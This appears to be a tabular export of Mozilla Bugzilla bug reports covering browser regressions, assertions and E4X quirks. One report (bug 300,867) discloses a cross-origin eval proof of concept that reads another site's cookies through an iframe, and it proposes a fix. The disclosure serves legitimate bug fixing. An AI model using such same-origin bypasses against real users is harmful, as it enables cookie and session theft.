Bug ID
int64 961
1.91M
| Comment ID
int64 3.98k
17.1M
| Author
stringlengths 8
48
| Comment Text
stringlengths 1
64.3k
⌀ |
---|---|---|---|
305,243 | 2,585,851 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.11) Gecko/20050729
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.11) Gecko/20050729
A well-formed, valid xsl file loaded from local disk via xmlHttpRequest has
valid contentText, but contentXML is null.
Mozilla seems to think the document is not XML.
(Local mime type for .xsl files is text/xsl.)
Reproducible: Always
Steps to Reproduce:
1.load local file with non-XML mime type via xmlHttpRequest
2.display xmlHttpRequest.contentXML
Actual Results:
contentXML is null
Expected Results:
The contentXML should be an XMLDocument.
|
|
305,639 | 2,589,154 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20050823 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20050823 Firefox/1.6a1
In trunk I see endless loading sites.
The same sites load normally in branch.
There is no cache involved this time; it also happens if I visit the site for
the first time.
Reproducible: Always
Steps to Reproduce:
1. Go with a recent trunk build to https://bugzilla.mozilla.org/
2. Enter in the search box: bfcache
3. The page will load endlessly
|
|
308,173 | 2,608,167 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
When printing a page with Firefox <= 1.0.6, if you chose to print any subsequent
pages after the first, Firefox would automatically select the last printer you used.
In Firefox 1.5 Beta 1, every time you print a new Web page, the print dialog
reverts to the default printer as listed in the Printers section of the Windows
Control Panel. This can be annoying if a printer on the network is offline and
you do not want to manually change the default printer for your current browsing
session.
Reproducible: Always
Steps to Reproduce:
1. Navigate to any Web page
2. Select "File -> Print..." from the menubar
Actual Results:
I realized the printer kept switching back to the default printer!
Expected Results:
I think the software should behave like its predecessors in that the default
printer should display ONLY if another printer has not been chosen for the
current browsing session. Once another printer has been chosen, it should
persist throughout that session.
|
|
308,438 | 2,610,382 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Gecko/1.8b4
I made an application (in fact, this is AI Roboform Adapter) that connects to
current browser instance and works with its content. And, of course, I needed a
way to disconnect from browser (==nsIDocShell object) at the right moment.
In Gecko 1.7, there were objects nsIWebShell and nsIWebShellContainer. So I
registered my own WebShell container in corresponding WebShell.
On call to nsIDocShell::destroy, the framework released the pointer to
WebShellContainer. As this was my container, I got that and initiated disconnect
sequence - dropped all references to nsIDocShell in my code. This used to work OK.
In Gecko 1.8, there are no more nsIWebShell and, of course,
nsIWebShellContainer. And I hardly can disconnect from browser properly.
Reproducible: Always
Steps to Reproduce:
Expected Results:
Have some way to intercept nsIDocShell::Destroy (event, release of stored
object, etc).
First found in Firefox/1.5b1
|
|
309,574 | 2,618,425 |
Following part of the steps frmo bug 309564, valgrind reports an invalid read in
nsJSEventListener::HandleEvent (of freed memory).
Steps to reproduce:
2. Visit the linked URL ( http://demo.planzo.com )
3. Click a box on the calendar and type a comment then press <ENTER>
4. Double-click the event you entered in Step 3.
The page is heavily DHTML and also does AJAX. I'll attach the info valgrind gives.
|
|
309,712 | 2,619,514 |
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b5) Gecko/20050922
Firefox/1.4
Steps to reproduce:
1. Hover one of the equipment icons in
http://www.thottbot.com/index.cgi?p=Aydsnizzeth.
Result: Nothing happens.
Expected: Info box should appear.
Regression from bug 309242, "E4X should be on by default, while preserving the
comment hiding hack".
Identified by MozillaZine Forum member bizarrojack in
http://forums.mozillazine.org/viewtopic.php?t=321123.
|
|
310,520 | 2,641,013 |
Steps to reproduce:
1. Open the testcase using a (trunk) debug build.
Result: "ASSERTION: RemovedAsPrimaryFrame called after PreDestroy"
This bug might be related to bug 310426, "Crash [@ DoDeletingFrameSubtree]
involving <select> with position:absolute child".
|
|
310,604 | 2,641,926 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20050930 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20050930 Firefox/1.4
The selectedIndex and currently selected option in a <select> dropdown are not
kept in sync when keyboard navigating (up and down) the option list, but only
with dropdowns in framesets, where the dropdown overlaps the frame boundary.
Once the dropdown has been activated, the highlighted selection will always lag
behind the current selection as shown in the box at the top of the dropdown. If
the frame border is dragged down such that the dropdown will no longer overlap,
the selection behaviour returns to that of Firefox 1.0.x.
Please note that this problem does not occur in Firefox 1.0.x.
Reproducible: Always
Steps to Reproduce:
1. Open testcase
2. Click on dropdown to activate it
3. Navigate down through the <option>s using the up and down arrow keys
4. Note the discrepancy between the actual selection in the box at the top of
the dropdown, and the <option> receiving highlight
5. Complete the selection and note that the actual selection is retained in the
dropdown.
6. Drag the frame border down such that the dropdown will not overlap it.
7. Click to activate the dropdown
8. Navigate down through the options using the up and down arrow keys
9. Note that the currently selected <option> is the one receiving highlight.
Note also that selectedIndex always lags behind by one selection.
Actual Results:
Discrepency is experienced between currently selected <option> and the one
receiving highlight.
Expected Results:
The currently selected <option> should be the one receiving highlight.
|
|
310,742 | 2,643,392 |
Steps to reproduce:
1- Load provided URL
2-
a) Click the "Attribute and methods of the DOCUMENT.BODY object" button
or
b) Click the "Attribute and methods of the EVENT object" button
Actual results in Seamonkey 1.1a rv: 1.9a1 build 2005100105 and Firefox 1.4.1
rv: 1.8b5 build 20051001:
a) document.object attribute and methods are listed twice
b) event attribute and methods are listed 3 times
Expected results:
Attributes and methods should be listed once and only once.
Reproducible: Always
Note:
- this must be a recent regression since I tried that demo not less than 2 weeks
ago.
- this could be a JS Engine component bug but I doubt it since the bug does not
happen for other objects
- if you try the DOCUMENT only button, you'll see that addEventListener is
listed twice
Reduced testcase coming up.
|
|
310,993 | 2,645,243 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051003 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051003 Firefox/1.6a1
Lloyds TSB (major UK bank) has the following code on their internet banking site:
if (document.StatementSearch.selectbox.value == 5 ) <!--no longer using
selectedindex, so no support for NN 4.7 -->
{
// do something
return false;
}
The inclusion of the HTML comment causes the if() to always evaluate to TRUE no
matter what value is selected. The Lloyds site functions normally with IE and
the following build of FF 1.5:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
In addition the JS console flags the line containing the if() and HTML comment
as containing a "useless expression".
Test case will follow.
Reproducible: Always
Steps to Reproduce:
1. Add an HTML comment to an if() statement in JS
2.
3.
Actual Results:
if() is always true
Expected Results:
execute the if() correctly
|
|
302,115 | 2,562,014 |
"Try again" on "Net Timeout Error" page loads wrong URL
STEPS TO REPRODUCE
1. make a request for http://1.2.3.4/ and wait for it to timeout...
(the "Net Timeout Error" page is presented.)
2. make a request that will succeed, e.g. http://www.mozilla.org/
3. go Back and wait for it to timeout again
4. click on "Try again"
ACTUAL RESULTS
The URL entered in step 2 loads
EXPECTED RESULTS
The URL entered in step 1 should be requested again, ideally without
killing forward history.
PLATFORMS & BUILDS TESTED
SeaMonkey nightly build 2005-07-23-01 trunk Linux (100% reproducible)
|
|
302,136 | 2,562,214 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050725 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050725 Firefox/1.0+ ID:2005072517
From chob's description on MozillaZine Forum,
http://forums.mozillazine.org/viewtopic.php?p=1629779#1629779 :
"It required TWO clicks of the 'Install Now' button to install an extension. In
both occasions, the counter on the button counts down 2 seconds. I'm sure only
one click should be necessary (after the countdown of course.)"
Reproducible: Always
Steps to Reproduce:
1.Click a link to install an .xpi
2.Installing Extension window appears.
3.Greyed out "Install" button counts down 2 seconds, then ungreys out ready to
be clicked.
4.After clicking, "Install now" button greys out, counts down 2 seconds again,
then ungreys out
Actual Results:
After clicking, "Install now" again, the extension installs.
Expected Results:
Extension should install on first click.
|
|
303,555 | 2,572,974 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6
the two entries are :
rememberPassword = Use Password Manager to remember this password.
rememberPassword = Remember
Reproducible: Always
Steps to Reproduce:
1.Open the file
2.
3.
Actual Results:
double entry
Expected Results:
only one entry
I suppose, according to the last changes that this string :
rememberPassword = Use Password Manager to remember this password.
should be removed
|
|
306,304 | 2,594,268 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.10) Gecko/20050725 Firefox/1.0.4 (Ubuntu package 1.0.6)
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b4) Gecko/20050829 Firefox/1.0+ ID:2005082901
You can't restore bookmarks by copying bookmarks.html from a old profile into a
new one.
Reproducible: Always
Steps to Reproduce:
1. close all FF instances
2. go to profile
3. delete bookmarks.bak
4. open Firefox
5. open bookmarks, all bookmarks are replaced by the default bookmarks
Expected Results:
FF builds a new bookmarks.bak out of the current bookmarks.html.
Tested with Linux (Ubuntu 5.04, firefox-1.0+.en-US.linux-i686.tar.gz)
This regressed between 2005080805 and 2005080905, so i suppose it's a regression
by Bug 298943 (if bookmarks.html is missing , bookmark.bak is not copied to
bookmarks.html).
To restore bookmarks you must copy over bookmarks.html and bookmarks.bak.
I think this problem is related to the bug described above:
1. close all FF instances
2. go to profile
3. replace bookmarks.html by a new bookmarks.html (different content)
4. open Firefox
5. open bookmarks, bookmarks are restored out of the bookmarks in bookmarks.bak
(expected: new bookmarks.bak out of the current bookmarks.html after closing)
6. sometimes the bookmarkfile (out of bookmarks.bak) is corrupted:
-bookmarks with umlauts are changed
before: ID="rdf:#$kFkEX3">TESTTEST-öööüüüäää-TESTTEST</A>
after: ID="rdf:#$kFkEX3">TESTTEST-öööüüüäää-TESTTEST</A>
-bookmarks are missing
With a Windows-build (Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4)
Gecko/20050828 Firefox/1.0+ ID:2005082823), i can't reproduce the two problems.
|
|
306,534 | 2,596,153 |
###!!! ASSERTION: Float frame has wrong parent: 'floatFrame->GetParent() ==
mBlock', file nsBlockReflowState.cpp, line 835
STEPS TO REPRODUCE
1. load the attached testcase
|
|
307,256 | 2,602,007 |
Noticed this with Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a1)
Gecko/20050906 Firefox/1.6a1
Hopefully someone else can track down a regression date...I don't have time for
at least another day.
|
|
307,315 | 2,602,475 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050906 Firefox/1.4
(I'm not sure what the component of this bug should be.)
In bug 306664, JS 1.6 support was added. But on 2005090618 branch,
<script type="application/javascript; version=1.6">
doesn't work at all, and
<script language="JavaScript1.6">
works, but E4X support is not enabled.
Reproducible: Always
Steps to Reproduce:
|
|
307,317 | 2,602,480 |
Starting with WAY_TOO_MUCH_GC asserts in JS regexp code:
STEPS TO REPRODUCE:
1) Apply patch from bug 305884
2) Apply patch from bug 307313
3) Start up with WAY_TOO_MUCH_GC
Assertion failure: c <= cs->length, at ../../../mozilla/js/src/jsregexp.c:1948
(gdb) where
#3 0xb7fd0103 in JS_Assert (s=0xb7ff4e73 "c <= cs->length",
file=0xb7ff4880 "../../../mozilla/js/src/jsregexp.c", ln=1948)
at ../../../mozilla/js/src/jsutil.c:63
#4 0xb7fb7866 in AddCharacterToCharSet (cs=0x81dabd8, c=47103)
at ../../../mozilla/js/src/jsregexp.c:1948
#5 0xb7fb80cc in ProcessCharSet (gData=0xbfffda10, charSet=0x81dabd8)
at ../../../mozilla/js/src/jsregexp.c:2150
#6 0xb7fba3d9 in InitMatch (cx=0x82fb138, gData=0xbfffda10, re=0x81dab48)
at ../../../mozilla/js/src/jsregexp.c:2960
#7 0xb7fba560 in js_ExecuteRegExp (cx=0x82fb138, re=0x81dab48, str=0x8256388,
indexp=0xbfffdac8, test=1, rval=0xbfffdc30)
at ../../../mozilla/js/src/jsregexp.c:3001
#8 0xb7fbc0f5 in regexp_exec_sub (cx=0x82fb138, obj=0x81cbcd8, argc=1,
argv=0x831eeb4,
test=1, rval=0xbfffdc30) at ../../../mozilla/js/src/jsregexp.c:3748
#9 0xb7fbc1af in regexp_test (cx=0x82fb138, obj=0x81cbcd8, argc=1, argv=0x831eeb4,
rval=0xbfffdc30) at ../../../mozilla/js/src/jsregexp.c:3767
#10 0xb7f73acb in js_Invoke (cx=0x82fb138, argc=1, flags=0)
at ../../../mozilla/js/src/jsinterp.c:1163
#11 0xb7f834ae in js_Interpret (cx=0x82fb138, pc=0x8203605 ":", result=0xbfffe3cc)
at ../../../mozilla/js/src/jsinterp.c:3458
#12 0xb7f73b4d in js_Invoke (cx=0x82fb138, argc=0, flags=0)
at ../../../mozilla/js/src/jsinterp.c:1183
#13 0xb7f834ae in js_Interpret (cx=0x82fb138, pc=0x8288beb ":", result=0xbfffeb9c)
at ../../../mozilla/js/src/jsinterp.c:3458
#14 0xb7f73b4d in js_Invoke (cx=0x82fb138, argc=1, flags=2)
at ../../../mozilla/js/src/jsinterp.c:1183
#15 0xb7997e64 in nsXPCWrappedJSClass::CallMethod (this=0x8229418,
wrapper=0x81c5180,
methodIndex=3, info=0x820f9c8, nativeParams=0xbfffef30)
at ../../../../../mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp:1339
#16 0xb7990b7b in nsXPCWrappedJS::CallMethod (this=0x81c5180, methodIndex=3,
info=0x820f9c8, params=0xbfffef30)
(gdb) jsstack
[Thread -1258189904 (LWP 21824) exited]
0 [native frame]
1 anonymous(file = [xpconnect wrapped (nsISupports, nsIFile, nsILocalFile) @
0x8221d40 (native @ 0x81b4650)])
["file:///home/bzbarsky/mozilla/vanilla/obj-firefox/dist/bin/components/nsExtensionManager.js":995]
section = "[email protected]"
filePD =
"/home/bzbarsky/mozilla/vanilla/obj-firefox/dist/bin/extensions/[email protected]"
this = [object Object]
2 anonymous()
["file:///home/bzbarsky/mozilla/vanilla/obj-firefox/dist/bin/components/nsExtensionManager.js":2541]
em = [object Object]
installItem = [function]
canUse = [function]
getParamBlock = [function]
installDroppedInFiles = [function]
isDirty = false
ignoreMTimeChanges = false
newItems =
droppedInFiles =
xpinstallStrings =
installLocations = [object Object]
location = [object Object]
actualItems = [object Object]
entries = [object Object]
entry = [xpconnect wrapped (nsISupports, nsIFile, nsILocalFile) @ 0x8221d40
(native @ 0x81b4650)]
installRDF = [xpconnect wrapped nsIFile @ 0x81ef410 (native @ 0x81b5550)]
id = undefined
item = undefined
zipReader = undefined
prettyName = undefined
jar = undefined
principal = undefined
certPrincipal = undefined
lf = undefined
actualMTime = undefined
i = undefined
this = [object Object]
3 anonymous(commandLine = [xpconnect wrapped nsICommandLine @ 0x8278c18 (native
@ 0x8270818)])
["file:///home/bzbarsky/mozilla/vanilla/obj-firefox/dist/bin/components/nsExtensionManager.js":2204]
isDirty = false
forceAutoReg = false
componentList = [xpconnect wrapped nsIFile @ 0x81ec688 (native @ 0x81b8cb8)]
needsRestart = undefined
this = [object Object]
4 [native frame]
Line 995 of nsExtensionManager.js after preprocessing is:
if (gIDTest.test(section))
which is
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/toolkit/mozapps/extensions/src/nsExtensionManager.js.in&rev=1.149#1000
More details at the assert site:
(gdb) frame 4
#4 0xb7fb7866 in AddCharacterToCharSet (cs=0x81dabd8, c=47103)
at ../../../mozilla/js/src/jsregexp.c:1948
1948 JS_ASSERT(c <= cs->length);
(gdb) p c
$1 = 47103
(gdb) p cs->length
$2 = 102
(gdb) p *gData->regexp->source
$10 = {length = 136162288, chars = 0x81bef5c}
Looking at jsregexp.c, I see at least the following problems:
regexp_compile() calls JS_ValueToString several times in a row and does nothing
to prevent the previous strings from being GCed. Not sure whether that's the
issue here...
|
|
300,325 | 2,548,127 |
STEPS TO REPRODUCE:
1) Add the following code to the end of the initMenu method in browser.js:
this.target.ownerDocument.documentElement.foo = 1;
alert(this.target.ownerDocument.documentElement.foo);
2) Build in browser/, start Firefox, open a context menu
ACTUAL RESULTS: Alert showing "undefined"
EXPECTED RESULTS: Alert showing "1"
I bet the problem is that the NewResolve hook for XPCNativeWrapper doesn't
define the property if it's not an XPConnectified one... Is this really
something we want not working with XPCNativeWrapper, though?
In any case, this blocks bug 295937, since I can't test a patch to that bug
because I can't set a property on an XPCNativeWrapper at all.
|
|
300,538 | 2,550,029 |
STEPS TO REPRODUCE: Load testcase in URL bar and follow directions
ACTUAL RESULTS:
###!!! ASSERTION: error in InsertChild: 'newRootView->GetNextSibling() ==
rootViewSibling', file ../../../mozilla/docshell/base/nsDocShell.cpp, line 5255
EXPECTED RESULTS: no asserts
I suspect the problem here is that we're passing PR_TRUE for the aAfter
parameter to InsertChild, but since the sibling we're passing is the old
nextSibling, we want to pass PR_FALSE...
|
|
300,863 | 2,552,264 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b3) Gecko/20050712 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b3) Gecko/20050712 Firefox/1.0+
URL history is not created for XUL error pages, making it impossible to go back
to the previous page when the link followed has error.
Reproducible: Always
Steps to Reproduce:
1. Visit the URL provided in a new tab (to avoid the previous history that may
confuse you)
2. Click on one of the links
3. Look at the toolbar
Actual Results:
Backward button is grayed out.
Expected Results:
Allow me to go backward since I didn't have klik installed.
Workaround: reload the error page. It will bring you back to the "previous page".
|
|
300,867 | 2,552,317 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.9) Gecko/20050714 Firefox/1.0.5
The security check for obj.eval(code, obj) has problem.
This is related to Bug 300008.
Exploit:
<script>
function a() {
var code = "alert(location.href + '\\nCookie: ' + document.cookie);";
frames[0].location.eval(code, frames[0]);
}
</script>
<iframe src="http://www.yahoo.com/" onload="a();"></iframe>
-----
http://lxr.mozilla.org/aviary101branch/source/js/src/jsdbgapi.c#668
668 JS_PUBLIC_API(JSPrincipals *)
669 JS_EvalFramePrincipals(JSContext *cx, JSStackFrame *fp, JSStackFrame *caller)
670 {
671 JSObject *callee;
672 JSPrincipals *principals, *callerPrincipals;
673
674 if (cx->findObjectPrincipals) {
675 callee = JSVAL_TO_OBJECT(fp->argv[-2]);
676 principals = cx->findObjectPrincipals(cx, callee);
677 } else {
678 principals = NULL;
679 }
680 if (!caller)
681 return principals;
682 callerPrincipals = JS_StackFramePrincipals(cx, caller);
683 return (principals && callerPrincipals &&
684 principals->subsume(principals, callerPrincipals))
685 ? callerPrincipals
686 : principals;
687 }
If my understanding is correct...
When eval's principal is not equal to caller's principal and neither eval's
principal nor caller's principal is the system principal, JS_EvalFramePrincipals
returns eval's principal because eval's principal does not subsume caller's
principal (and vice versa). In this case, if JS_EvalFramePrincipals returned
caller's principal, the security check probably could work good.
return (principals && callerPrincipals &&
principals->subsume(principals, callerPrincipals))
? callerPrincipals
: principals;
Is the above code able to be replaced with the following code?
return (principals && callerPrincipals &&
callerPrincipals->subsume(callerPrincipals, principals))
? principals
: callerPrincipals;
And, this change could stop Bug 297543 comment 18 attachment 188804, I guess.
Reproducible: Always
Steps to Reproduce:
|
|
301,260 | 2,555,524 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Basically, elements with a 'null' namespace don't get serialized that way such
that when a serialize / parse cycle occurs, the resulting document is not at all
what the original document intended.
The test case has much more explanatory text and example code.
Reproducible: Always
Steps to Reproduce:
1. Run the given test case
2.
3.
Actual Results:
The serializer did not serialize properly.
Expected Results:
The serializer to have serialized properly.
|
|
301,573 | 2,558,003 |
User-Agent: Mozilla/3.04 (WinNT; I)
Build Identifier: Up-to-date JS debug shell
This seems wrong:
js> <xml><</xml>
typein:1: SyntaxError: illegal XML character:
typein:1: <parent xmlns=''><xml><</xml></parent>
typein:1: .......................^
js> <xml>&lt;</xml>
<
js> <xml>&</xml>
typein:3: SyntaxError: unexpected end of XML entity:
typein:3: <parent xmlns=''><xml>&</xml></parent>
typein:3: ......................^
Expected output (as seen in Rhino) would be:
js> <xml><</xml>
<
js> <xml>&lt;</xml>
<
js> <xml>&</xml>
&
Reproducible: Always
Steps to Reproduce:
|
|
301,702 | 2,558,991 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Build Identifier: Firefox and Thunderbird 1.0+ l10n nightly trunk builds
There is still one more l10n issue, when installing localized Thunderbird /
Firefox win32 builds: the created registry entries have "en" / "en-US" instead
of the correct locale (e.g. "de").
AFAIK we have 2 files creating the registry entries:
- config.ini in the installer
> l10n teams have the possibility to change "(en)" to the correct locale (e.g.
"(de)").
- install.js in mail.xpi / browser.xpi
> AFAIK l10n teams don't have the possibility to localize the given "(en-US)"
entries
Reproducible: Always
Steps to Reproduce:
1. Install a l10n Firefox / Thunderbird nightly trunk 1.0+ build
2. Have a look into the win32 registry
3.
Actual Results:
You'll find "en" or "en-US" instead of the correct locale in many registry entries.
Expected Results:
We should have only the correct locales in the registry.
|
|
324,960 | 2,759,517 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060127 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060127 Firefox/1.6a1
Seems there is a regression from #317375.
When using css "background" with "no-repeat", image isn't displayed. See testcase.
Reproducible: Always
Steps to Reproduce:
1. open testcase
Actual Results:
no background image is displayed
Expected Results:
background image displayed
|
|
327,036 | 2,775,488 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20060131 Firefox/1.5
None of the items in the OS's Bookmarks menu, in the app's main menubar, work. Plain bookmarks don't go anywhere; folders show a hierarchical arrow but don't expand.
Reproducible: Always
Steps to Reproduce:
1. Launch Firefox
2. Open "Bookmarks" menu from app menubar
3. Choose one of the bookmarks or bookmark folders
Actual Results:
Nothing happens. If a bookmark is chosen, it blinks and the menu goes away, but that's all. Hierarchical menus (folders) are completely unresponsive, doing nothing but highlighting on mouseover.
Expected Results:
Folders expand hierarchically. Bookmarks go to websites.
This is the 20060131 Places build, posted as the 20060128 nightly.
|
|
317,865 | 2,707,853 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
On http://lxr.mozilla.org/seamonkey/source/js/src/xpconnect/src/xpcruntimesvc.cpp#129 :
const uint32 gGCSize = 4L * 1024L * 1024L; /* pref? */
Could the comment be realized into an setting in preferences?
I think I have reached this limit at
http://ondra.zizka.cz/projekty/bugs/sm_array_limit.html
(Causes Out of memory exception.)
But I am not sure whether it is _that_ limit, because at
http://www.mozilla.org/js/spidermonkey/apidoc/gen/api-JS_NewRuntime.html :
"maxbytes specifies the number of allocated bytes after which garbage collection is run."
But anyway, if it is not the limit: 4 megabytes is really very little. Something should be increased to allow at least milion floats (that gives around 10 MBs?) Firefox takes several thousands of megabytes usually, so why bother with few MB for JavaScript. It's not allocated "physically" until you use it, anyway.
Thanks, Ondra
Reproducible: Always
Steps to Reproduce:
http://ondra.zizka.cz/projekty/bugs/sm_array_limit.html
Actual Results:
Out of memory exception is thrown and Firefox (JavaScript) hangs (on Win32).
Expected Results:
Like MSIE - take as much memory as needed. That could be optional. Use some limit otherwise, but more than 4 MB (one should be able to set this too).
Firefox & JavaScript becomes a good tool for first-scratch code to test algorithms. This limit prevents it being used for larger apps.
|
|
320,192 | 2,722,892 |
At the Firefox Summit last week, in the session http://wiki.mozilla.org/2005Offsite/Memory_Leaks , I discussed better ways for users/testers to find leaks and reduce testcases for leaks. I'm attaching a way to do this that has some PR-logging code and a perl script to post-process the NSPR logs. So far I'm just logging four classes. One of those four is often entrained in leaks of large object graphs, and they all provide a good way to log URIs associated with the leaks. This means a user can browse for a long time (as normal), run the perl script over the log, and then determine at least which pages were associated with leaks. The user could then repeat the logging while testing those pages more carefully to get to exact steps to reproduce.
timeless says he has a patch that will allow multiple calls to PR_NewLogModule with the same string to work correctly. That would make this a little cleaner...
|
|
321,468 | 2,732,144 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla XULRunner 1.9a1 (CVS HEAD as of about 25 Dec 2005 08:01:17 -0000)
At least with an en-US locale, GTK2 allows Unicode characters to be entered into input fields by hex codepoint value. This is done by typing the hex number (using 0-9, A-F) while holding down the Ctrl and Shift keys. For instance, the copyright sign, ©, may be entered with Ctrl+Shift+A+9. (In fact I just did so in the previous sentence, using this very functionality in Firefox on Bugzilla's "Enter a Bug" page.)
Such key sequences are captured by GTK2's input-method handling code (specifically, gtk_im_context_filter_keypress), called from nsWindow::IMEFilterEvent. Unfortunately, nsWindow::OnKeyPressEvent simply returns TRUE in these cases, and never calls nsCommonWidget::DispatchEvent to send the event down the event stack, so that DOM/JS event handlers can see/cancel it.
This is bad because, while the default handling of such key sequences is nice as a default, XUL application developers (using xulrunner or even from an extension) should be able at least to *see* these events from within JS, and ideally should be able to prevent the IME handling of them using nsIDOMEvent::preventDefault. In general, IME handling of an event should only occur *after* DOM processing, and then only if the event hasn't been canceled.
Reproducible: Always
Steps to Reproduce:
(Using GTK2-based xulrunner or XUL-based app, of course.)
1. Register a keypress event listener on a XUL window containing a text input field. Have the listener send up an alert popup whenever it receives a key event.
2. In the input field, type Ctrl+Shift+..., where ... is any of 0-9, A-F.
Actual Results:
You don't get any alert popup for the IME-captured events.
Expected Results:
You should have gotten an alert popup for each key event. IME processing should have occurred only if preventDefault wasn't called on the event object.
I have a patch which allows a platform-specific event pointer and IME-handling function to be attached to an nsKeyEvent. These are called upon, if present, within nsGenericElement::HandleDOMEvent, after the event has been sent through the DOM event stack, but before the "local handling stage." It works and it should maintain platform-neutrality; however, being as this is my first attempt at hacking the Mozilla source, I wouldn't be surprised if there's a better way to fix the problem.
|
|
321,549 | 2,732,708 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051219 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051219 Firefox/1.6a1
During the testing of bug 318922 many inconsistencies where found in the use of {} expression value substitution in E4X syntax in the Mozilla implementation.
Example
// test 1
b='b';
a=<a xmlns:p='http://a.uri/'>
<p:b{b}>x</p:bb>
</a>;
is valid per mozilla implementation
But
// test 2
b='b';
a=<a xmlns:p='http://a.uri/'>
<p:{b}b>x</p:bb>
</a>;
gives
SyntaxError: invalid XML qualified name
Reproducible: Always
Steps to Reproduce:
go thru attachment e4x_inconsistancy.html
Actual Results:
some INVALID SYNTAX other VALID SYNTAX
Expected Results:
Expect for the last test, all of the should be either INVALID SYNTAX or all should be VALID SYNTAX to avoid any inconsistency.
|
|
321,751 | 2,734,116 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Background color is not rendered completly when an intial alert dialog comes up.
Reproducible: Always
Steps to Reproduce:
1.Load http://andrewwooldridge.com/testingstuff/bgbug.html
2.click the alert ok
3.view the resulting page
Actual Results:
The words "hello" are colored tan. The rest of the page is white.
Expected Results:
The entire page should be tan.
The page will suddenly be the right background color if you resize the window.
|
|
311,380 | 2,648,668 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
When printing out a web page that has a combo box on it, the text in the combo
box is cut off after the first whitespace.
Reproducible: Always
Steps to Reproduce:
1. Go to a page that has a combo box with an item having a space in it. (An
example is at http://forums.beyondunreal.com/forumdisplay.php?f=12, at the
bottom of the page)
2. Select that item, if it is not already selected.
3. Print the page.
Actual Results:
The text in the combo box only shows the first word of the item.
Expected Results:
The entire combo box text should be printed.
|
|
311,822 | 2,651,821 |
